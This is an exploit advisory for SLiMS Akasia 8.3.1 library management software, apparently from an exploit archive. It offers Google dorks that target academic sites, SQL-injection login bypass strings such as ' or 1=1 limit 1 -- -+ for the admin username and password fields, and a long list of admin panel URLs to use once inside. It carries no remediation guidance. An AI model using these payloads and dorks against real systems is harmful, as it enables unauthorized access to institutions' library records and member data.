Slims CMS Akasia 8.3.1 SQL Injection

`####################################################################  
  
# Exploit Title : Slims CMS Akasia 8.3.1 Improper Authorization Vulnerability  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 20/05/2019  
# Vendor Homepage : slimsetd.id - slims.web.id  
# Software Download Link : slims.web.id/goslims/?wpdmpro=slims-8-3-1-akasia  
# Software Information Link : foss4lib.org/package/senayan-library-management-system-slims/release/8.3.1  
# Software Version : 8.3.1  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks :  
intext:Template By Erwan Setyo Budi. Powered By SLiMS and ShapeBootstrap. site:ac.id  
intext:Powered By SETIADI and ShapeBootstrap. site:ac.id  
# Vulnerability Type :   
CWE-285 [ Improper Authorization ]  
CWE-284 [ Improper Access Control ]  
CWE-592 [ Authentication Bypass Issues ]  
CWE-287 [ Improper Authentication ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
Setiadi is an automation system that serves to manage repository such as thesis and   
dissertation. Setiadi is built based on SLiMS (Senayan Library Management System).  
Setiadi is an open source automation, licensed under GPL v3, built using PHP   
and MySQL database.  
  
SENAYAN Library Management System (SLiMS) version 8 Codename Akasia  
SLiMS is free open source software for library resources management   
(such as books, journals, digital document and other library materials) and  
administration such as collection circulation, collection management, membership,  
stock taking and many other else.  
  
####################################################################  
  
# Impact :  
***********  
The software does not restrict or incorrectly restricts access to a resource   
from an unauthorized actor.  
  
The software does not perform or incorrectly performs an authorization check when   
an actor attempts to access a resource or perform an action.  
  
When an actor claims to have a given identity, the software does not prove or   
insufficiently proves that the claim is correct.  
  
Assuming a user with a given identity, authorization is the process of determining whether   
that user can access a given resource, based on the user's privileges and any permissions   
or other access-control specifications that apply to the resource.  
  
When access control checks are not applied consistently - or not at all - users are able   
to access data or perform actions that they should not be allowed to perform.   
This can lead to a wide range of problems, including information exposures,   
denial of service, and arbitrary code execution.  
  
####################################################################  
  
# Authentication Bypass / Improper Access Control / Improper Authorization Exploit :  
**************************************************************************  
Admin Panel Login Path :  
************************  
/index.php?p=login  
/admin  
  
Admin Username :   
admin  
admin' --  
'=''or'  
' or 1=1 limit 1 -- -+  
anything' OR 'x'='x  
  
Admin Password :   
admin  
admin' --  
'=''or'  
' or 1=1 limit 1 -- -+  
anything' OR 'x'='x  
  
Useable Admin Control Panel Links Exploits :  
******************************************  
/admin/modules/system/app_user.php?changecurrent=true&action=detail  
/admin/index.php?mod=bibliography  
/admin/modules/bibliography/index.php?action=detail  
/admin/modules/bibliography/item.php  
/admin/modules/bibliography/checkout_item.php  
/admin/modules/bibliography/z3950sru.php  
/admin/modules/bibliography/z3950.php  
/admin/modules/bibliography/p2p.php  
/admin/modules/bibliography/dl_print.php  
/admin/modules/bibliography/item_barcode_generator.php  
/admin/modules/bibliography/marcexport.php  
/admin/modules/bibliography/marcimport.php  
/admin/modules/bibliography/printed_card.php  
/admin/modules/bibliography/export.php  
/admin/modules/bibliography/import.php  
/admin/modules/bibliography/item_export.php  
/admin/modules/bibliography/item_import.php  
/admin/index.php?mod=circulation  
/admin/modules/circulation/index.php?action=start  
/admin/modules/circulation/quick_return.php  
/admin/modules/circulation/loan_rules.php  
/admin/modules/reporting/customs/loan_history.php  
/admin/modules/reporting/customs/overdued_list.php  
/admin/modules/reporting/customs/reserve_list.php  
/admin/index.php?mod=membership  
/admin/modules/membership/index.php  
/admin/modules/membership/index.php?action=detail  
/admin/modules/membership/member_type.php  
/admin/modules/membership/member_card_generator.php  
/admin/modules/membership/export.php  
/admin/modules/membership/import.php  
/admin/index.php?mod=master_file  
/admin/modules/master_file/index.php  
/admin/modules/master_file/rda_cmc.php?type=content  
/admin/modules/master_file/rda_cmc.php?type=media  
/admin/modules/master_file/rda_cmc.php?type=carrier  
/admin/modules/master_file/publisher.php  
/admin/modules/master_file/supplier.php  
/admin/modules/master_file/author.php  
/admin/modules/master_file/topic.php  
/admin/modules/master_file/location.php  
/admin/modules/master_file/news_type.php  
/admin/modules/master_file/place.php  
/admin/modules/master_file/item_status.php  
/admin/modules/master_file/coll_type.php  
/admin/modules/master_file/doc_language.php  
/admin/modules/master_file/label.php  
/admin/modules/master_file/frequency.php  
/admin/modules/master_file/p2pservers.php  
/admin/modules/master_file/item_code_pattern.php  
/admin/modules/master_file/author.php?type=orphaned  
/admin/modules/master_file/topic.php?type=orphaned  
/admin/modules/master_file/publisher.php?type=orphaned  
/admin/modules/master_file/place.php?type=orphaned  
/admin/index.php?mod=stock_take  
/admin/modules/stock_take/index.php  
/admin/modules/stock_take/init.php  
/admin/modules/system/index.php  
/admin/index.php?mod=system  
/admin/modules/system/envinfo.php  
/admin/modules/system/ucsetting.php  
/admin/modules/system/theme.php  
/admin/modules/system/content.php  
/admin/modules/system/biblio_indexes.php  
/admin/modules/system/module.php  
/admin/modules/system/app_user.php  
/admin/modules/system/user_group.php  
/admin/modules/system/shortcut.php  
/admin/modules/system/holiday.php  
/admin/modules/system/barcode_generator.php  
/admin/modules/system/sys_log.php  
/admin/modules/system/backup.php  
/admin/index.php?mod=reporting  
/admin/modules/reporting/index.php  
/admin/modules/reporting/loan_report.php  
/admin/modules/reporting/member_report.php  
/admin/modules/reporting/customs/class_recap.php  
/admin/modules/reporting/customs/titles_list.php  
/admin/modules/reporting/customs/item_titles_list.php  
/admin/modules/reporting/customs/item_usage.php  
/admin/modules/reporting/customs/loan_by_class.php  
/admin/modules/reporting/customs/member_list.php  
/admin/modules/reporting/customs/member_loan_list.php  
/admin/modules/reporting/customs/loan_history.php  
/admin/modules/reporting/customs/due_date_warning.php  
/admin/modules/reporting/customs/overdued_list.php  
/admin/modules/reporting/customs/staff_act.php  
/admin/modules/reporting/customs/visitor_report.php  
/admin/modules/reporting/customs/visitor_report_day.php  
/admin/index.php?mod=chat  
/admin/index.php?mod=serial_control  
/admin/modules/serial_control/index.php  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`